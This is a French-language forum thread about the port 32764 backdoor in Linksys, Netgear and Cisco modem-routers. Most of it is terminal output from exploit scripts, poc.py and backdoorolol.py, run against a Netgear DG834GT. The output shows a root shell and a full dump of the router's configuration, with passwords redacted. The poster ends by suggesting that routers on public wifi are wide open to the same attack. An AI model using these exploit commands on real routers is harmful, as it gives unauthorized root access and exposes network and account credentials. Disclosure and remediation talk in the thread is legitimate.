BACKDOOR:Modem-routeurs Linksys,Netgear,Cisco 32764 backdoor

Ola \o_

github.com/elvanderb/TCP-32764

root@debian:/home/angel/Documents/gnu/TCP-32764-master# python poc.py --ip 192.168.0.1
192.168.0.1:32764 is vulnerable!
root@debian:/home/angel# curl 192.168.0.1:32764
curl: (56) Recv failure: Connexion ré-initialisée par le correspondant
MMcS����

(56) Recv failure: Connexion ré-initialisée par le correspondant

Netgear DG834GT Firmware Version V1.03.23 , dernier firmware et toujours pas corrigé ?

PORT STATE SERVICE VERSION
80/tcp open http Netgear DG834GT router http config
|http-methods: No Allow or Public header in OPTIONS response (status code 501)
| http-auth:
| HTTP/1.1 401 Unauthorized
|
Basic realm=NETGEAR DG834GT
|_http-title: Authorization warning
1863/tcp filtered msnp
5050/tcp filtered mmcc
5190/tcp filtered aol
32764/tcp open unknown <--------------------- ??? @@

j’arrive pas à trouver suffisamment d’infos sur le quand ça sera corrigé ou comment parader !

THX

Ça c’est depuis le LAN, mais depuis l’extérieur ?

=======
Si ce port est ouvert depuis l’extérieur, il devrait être possible de faire une redirection de port pour que les accès depuis l’extérieur par ce port soient redirigés vers une adresse LAN inutilisée.

bah je peux pas tester depuis l’exterieur, mais de l’interieur ça craint carrément -_-, j’ai mis supprimé pour les infos confidentielles

angel@debian:~/Documents/gnu/TCP-32764-master$ python backdoorolol.py --ip 192.168.0.1 --port 32764 --shell
welcome, here is a root shell, have fun

angel@debian:~/Documents/gnu/TCP-32764-master$ python backdoorolol.py --ip 192.168.0.1 --port 32764 --print_conf
time_zone=GMT-1
time_daylight=1
restore_default=0
wiz_language=English
wiz_country=France
fix_ipaddr=
fix_netmask=
fix_gateway=
wan_ifname=ppp0
wan_mode=pppoa
wan_iptype=Dynamic
wan_ipaddr=
wan_netmask=
wan_gateway=
wan_mtu=1500
wan_fix_dns=1
wan_dns1=208.67.220.220
wan_dns2=208.67.222.222
wan_macaddr=
wan_encap=1
wan_vpi=8
wan_vci=35
wan_account=
wan_domain=
wan_dod=1
lan_if=br0
lan_ipaddr=192.168.0.1
lan_netmask=255.255.255.0
lan_bipaddr=192.168.0.255
dhcp_server_enable=1
dhcp_start_ip=192.168.0.2
dhcp_end_ip=192.168.0.254
dhcp_reserved=
http_username=admin
http_password=supprimé
http_timeout=5
rt_static_route=
rt_rip_version=1
rt_rip_direction=0
ddns_enable=0
ddns_service_provider=dyndns
ddns_user_name=
ddns_password=
ddns_host_name=
ddns_use_wildcards=0
pppoe_username=
pppoe_password=
pppoe_idle=0
pppoe_service=
pppoa_username=fti/supprimé
pppoa_password=supprimé
pppoa_idle=0
pppoa_ipaddr=
wifi_ssid=CISCO
wifi_region=Europe
wifi_channel=11
wifi_auth_type=3
wifi_key_len=128
wifi_def_key=1
wifi_key1=supprimé
wifi_key2=supprimé
wifi_key3=supprimé
wifi_key4=supprimé
wifi_access_control=0
wifi_access_list=
wifi_if_on=1
wifi_broadcast_ssid=1
wifi_wep_on=1
wifi_dot11_mode=0
wifi_dot11_iso=1
wifi_radius_port=1812
mail_enable=1
mail_logfull=0
mail_sendlog=2
mail_server=smtp.wanadoo.fr
mail_recipient=supprimé@wanadoo.fr
mail_dos=1
mail_portscan=1
mail_block=1
mail_sh_day=
mail_sh_hour=0
log_dos=1
log_block=1
log_login=1
log_gateway=1
log_type=0
log_remote_ip=
fw_disable=0
fw_nat=1
fw_block=0
fw_block_keyword=
fw_block_trust_enable=0
fw_block_trust=
fw_services_def=Any(ALL):any:1-65535
Any(TCP):tcp:1-65535
Any(UDP):udp:1-65535
AIM:tcp:5190-5190
BGP:tcp:179-179
BOOTP_CLIENT:udp:68-68
BOOTP_SERVER:udp:67-67
CU-SEEME:both:7648-24032
DNS:both:53-53
FINGER:tcp:79-79
FTP:tcp:20-21
H.323:tcp:1720-1720
HTTP:tcp:80-80
HTTPS:tcp:443-443
IDENT:tcp:113-113
IRC:both:6667-6667
NEWS:tcp:144-144
NFS:udp:2049-2049
NNTP:tcp:119-119
POP3:tcp:110-110
RCMD:tcp:512-512
REAL-AUDIO:tcp:7070-7070
REXEC:tcp:514-514
RLOGIN:tcp:513-513
RTELNET:tcp:107-107
RTSP:both:554-554
SFTP:tcp:115-115
SMTP:tcp:25-25
SNMP:both:161-161
SNMP-TRAPS:both:162-162
SQL-NET:tcp:1521-1521
SSH:both:22-22
STRMWORKS:udp:1558-1558
TACACS:udp:49-49
TELNET:tcp:23-23
TFTP:udp:69-69
VDOLIVE:tcp:7000-7000
VPN-IPSEC:udp:500-500
VPN-L2TP:udp:1701-1701
VPN-PPTP:tcp:1723-1723
fw_services=
fw_in_rules=
fw_out_rules=
fw_dmz_enable=0
fw_dmz=
fw_spi=1
fw_response_ping=0
fw_schedule=1111111:0:0-24:0
fw_time_zone=+1c
fw_remote=0
fw_remote_type=
fw_remote_range_start=
fw_remote_range_end=
fw_remote_single=
fw_remote_port=8080
fw_import=1
ntp_custom=0
ntp_server=
upnp_enable=0
upnp_adv_time=30
upnp_ttl=4
upnp_permission=enable
upnp_default=
upnp_custom=
snmp_enable=0
snmp_read_community=
snmp_sys_name=
snmp_sys_contact=
snmp_sys_location=
blank_state=0
ca_wsectype=wep
wifi_present=1
wifi_features=1
wiz_runtest=
ipoa_mode=
mail_enable_auth=1
mail_login=supprimé
mail_password=supprimé
pppoe_ipaddr=
ipoa_ipaddr=
ipoa_netmask=
ipoa_gateway=
wifi_psk_pwd=
wifi_radius_server=
wifi_radius_login_key=
wifi_wds=
wifi_wds_apmode=
wifi_wds_repeater1mac=
wifi_wds_repeater2mac=
wifi_wds_repeater3mac=
dis_sip_alg=
vpn=
backdoorolol.py.tar.gz (1.85 KB)

ça marcherait apparemment pas depuis l’exterieur , cependant sur un wifi public ayant ces genres de modem_routeur … c’est tout ouvert GAMES_OPEN \o/